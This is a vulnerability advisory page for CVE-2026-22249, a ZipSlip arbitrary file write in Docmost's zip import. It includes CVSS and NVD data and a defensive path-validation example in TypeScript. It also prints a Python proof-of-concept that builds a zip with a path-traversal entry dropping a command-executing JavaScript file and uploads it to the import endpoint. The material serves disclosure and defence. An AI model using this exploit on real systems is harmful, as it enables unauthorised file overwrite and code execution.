Security Vulnerability Report
CVE-2026-22249 CVSS 7.1 HIGH

CVE-2026-22249

Published: 2026-01-15 19:16:06
Last Modified: 2026-01-22 15:44:51

Description

Docmost is an open-source collaborative wiki and documentation software. From 0.21.0 to before 0.24.0, Docmost is vulnerable to Arbitrary File Write via the Zip Import feature (ZipSlip). In apps/server/src/integrations/import/utils/file.utils.ts, there is no validation of the filename of archive entries before they are written to disk. This vulnerability is fixed in 0.24.0.
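The description above states the root cause: entry names taken from the uploaded archive are written without validation, so a name such as ../../../x escapes the import directory. The TypeScript below is an added example written for this page, not Docmost's code and not the project's actual fix; it shows the guard an extraction routine needs before writing any entry. The root path /srv/docmost/import, the function names and the sample entry list are assumptions constructed for the demonstration.

```typescript
import * as path from "path";

// Added example, not Docmost's code: the canonical guard against ZipSlip (CWE-22).
// Given the directory the archive is unpacked into and one entry name read from
// the zip central directory, return the absolute path the entry may be written
// to, or null if the name would land outside the root.
export function resolveEntryPath(root: string, entryName: string): string | null {
  // Embedded NUL bytes, absolute POSIX paths and Windows drive prefixes are
  // never legitimate for an archive entry; reject them before normalising.
  if (entryName.includes("\0") || path.isAbsolute(entryName) || /^[A-Za-z]:[\\/]/.test(entryName)) {
    return null;
  }
  const rootAbs = path.resolve(root);
  // Treat backslashes as separators so "..\\..\\x" is caught on POSIX hosts too.
  const candidate = path.resolve(rootAbs, entryName.replace(/\\/g, "/"));
  // After resolution the target must be strictly inside the root. A relative
  // path from the root that is empty (the root itself), exactly "..", or that
  // begins with "../" means the entry escaped.
  const rel = path.relative(rootAbs, candidate);
  if (rel === "" || rel === ".." || rel.startsWith(".." + path.sep) || path.isAbsolute(rel)) {
    return null;
  }
  return candidate;
}

// Split a list of entry names into those safe to extract and those to reject.
// An importer would normally abort the whole import on the first rejection
// rather than silently skip entries, so the caller can decide on policy here.
export function partitionEntries(
  root: string,
  names: string[],
): { accepted: string[]; rejected: string[] } {
  const accepted: string[] = [];
  const rejected: string[] = [];
  for (const name of names) {
    (resolveEntryPath(root, name) === null ? rejected : accepted).push(name);
  }
  return { accepted, rejected };
}

// Constructed sample entries (not taken from a real archive), including the
// traversal name quoted in the PoC on this page.
export const SAMPLE_ENTRIES: string[] = [
  "pages/intro.md",
  "pages/sub/../notes.md",
  "../../../var/www/html/static/evil.js",
  "/etc/cron.d/job",
  "..\\..\\escape.txt",
  "attachments/\0hidden",
];

// Runs the check over the constructed sample against an assumed import root.
export function demo(): { accepted: string[]; rejected: string[] } {
  const result = partitionEntries("/srv/docmost/import", SAMPLE_ENTRIES);
  console.log("accepted:", result.accepted);
  console.log("rejected:", result.rejected);
  return result;
}
```

Calling demo() accepts the two ordinary entries (the inner ".." in pages/sub/../notes.md still resolves inside the root) and rejects the other four. The check is done on the resolved path rather than by searching the name for "..", because the resolved form is what the filesystem will actually use, which is also why a trailing-slash or relative root is normalised with path.resolve first.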

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:docmost:docmost:*:*:*:*:*:*:*:* - VULNERABLE
All Docmost versions from 0.21.0 up to, but not including, 0.24.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import zipfile
import os
import sys
import requests

# PoC for CVE-2026-22249: Docmost ZipSlip Arbitrary File Write
# This script demonstrates how an attacker can exploit the ZipSlip vulnerability


def create_malicious_zip(target_path, output_file):
    """
    Create a malicious ZIP file containing a file with path traversal in its name
    """
    with zipfile.ZipFile(output_file, 'w') as zf:
        # Create a file with path traversal sequence to write outside target directory
        # Adjust the number of ../ based on the actual directory structure
        malicious_filename = '../../../var/www/html/static/evil.js'
        malicious_content = b'// Malicious JavaScript - Remote Code Execution\n'
        malicious_content += b'const { execSync } = require("child_process");\n'
        malicious_content += b'execSync(process.argv[1]);\n'
        # Add the malicious file to the ZIP archive
        zf.writestr(malicious_filename, malicious_content)
        print(f'[+] Created malicious file: {malicious_filename}')
        print(f'[+] Output ZIP: {output_file}')


def main():
    if len(sys.argv) < 3:
        print('Usage: python cve-2026-22249-poc.py <target_url> <output_zip>')
        print('Example: python cve-2026-22249-poc.py http://docmost.local:3000 malicious.zip')
        sys.exit(1)
    target_url = sys.argv[1]
    output_file = sys.argv[2]
    # Create the malicious ZIP file
    create_malicious_zip('/api/import/upload', output_file)
    # Upload the malicious ZIP file
    upload_url = f'{target_url}/api/import/upload'
    print(f'\n[!] Upload the {output_file} file through the Docmost import feature')
    print('[!] The file will be extracted and written to an arbitrary location')
    print('[!] Target path: ../../../var/www/html/static/evil.js')
    # Attempt to upload
    try:
        with open(output_file, 'rb') as f:
            files = {'file': (output_file, f, 'application/zip')}
            response = requests.post(upload_url, files=files, timeout=30)
        print(f'\n[+] Response Status: {response.status_code}')
        print(f'[+] Response: {response.text}')
    except requests.exceptions.RequestException as e:
        print(f'[-] Error uploading file: {e}')


if __name__ == '__main__':
    main()

References

https://github.com/docmost/docmost/commit/c3b350d943108552e20654580005cd6f6c78ab05 (Patch)
https://github.com/docmost/docmost/pull/1753 (Issue Tracking)
https://github.com/docmost/docmost/releases/tag/v0.24.0 (Release Notes)
https://github.com/docmost/docmost/security/advisories/GHSA-54pm-hqxm-54wg (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22249", "sourceIdentifier": "[email protected]", "published": "2026-01-15T19:16:05.527", "lastModified": "2026-01-22T15:44:51.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Docmost is an open-source collaborative wiki and documentation software. From 0.21.0 to before 0.24.0, Docmost is vulnerable to Arbitrary File Write via Zip Import Feature (ZipSlip). In apps/server/src/integrations/import/utils/file.utils.ts, there are no validation on filename. This vulnerability is fixed in 0.24.0."}, {"lang": "es", "value": "Docmost es un software de wiki colaborativo y documentación de código abierto. Desde la 0.21.0 hasta antes de la 0.24.0, Docmost es vulnerable a la escritura arbitraria de archivos a través de la función de importación de Zip (ZipSlip). En apps/servidor/src/integrations/import/utils/file.utils.ts, no hay validación en el nombre de archivo. Esta vulnerabilidad está corregida en la 0.24.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": 
"Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:docmost:docmost:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.21.0", "versionEndExcluding": "0.24.0", "matchCriteriaId": "6B3C6E1E-C674-45AA-A3B0-6518B205D8B5"}]}]}], "references": [{"url": "https://github.com/docmost/docmost/commit/c3b350d943108552e20654580005cd6f6c78ab05", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/docmost/docmost/pull/1753", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/docmost/docmost/releases/tag/v0.24.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/docmost/docmost/security/advisories/GHSA-54pm-hqxm-54wg", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/docmost/docmost/security/advisories/GHSA-54pm-hqxm-54wg", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}